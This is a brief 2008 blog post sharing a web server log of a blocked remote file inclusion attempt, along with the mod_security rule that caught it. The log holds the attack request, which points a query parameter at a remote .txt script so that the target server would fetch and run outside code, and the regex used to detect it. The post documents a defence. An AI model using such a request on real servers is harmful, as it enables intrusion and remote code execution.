Monday, December 22, 2008

Tehauto-nn.ru

Request: blogs.xxxxx.com 80.93.58.70 - - [21/Dec/2008:16:12:40 +0700] "GET //?id=http://www.tehauto-nn.ru/safe1.txt??? HTTP/1.1" 403 211 "-" "libwww-perl/
5.805" - "-"
Handler: proxy-server
----------------------------------------
GET //?id=http://www.tehauto-nn.ru/safe1.txt??? HTTP/1.1
Connection: TE, close
Host: blogs.xxxxx.com
TE: deflate,gzip;q=0.3
User-Agent: libwww-perl/5.805
mod_security-action: 403
mod_security-message: Access denied with code 403. Pattern match "=(http|www|ftp)\:/(.+)\.(c|dat|kek|gif|jpe?g|jpeg|png|sh|txt|bmp|dat|txt|js|html?|tmp|asp)
\x20?\?" at REQUEST_URI [id "390144"][rev "1"] [msg "Rootkit attack: Generic Attempt to install rootkit"] [severity "CRITICAL"]

HTTP/1.1 403 Forbidden
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
--89799752--

Doh.. NigeriaN HackerS TeaM

0 comments:

Post a Comment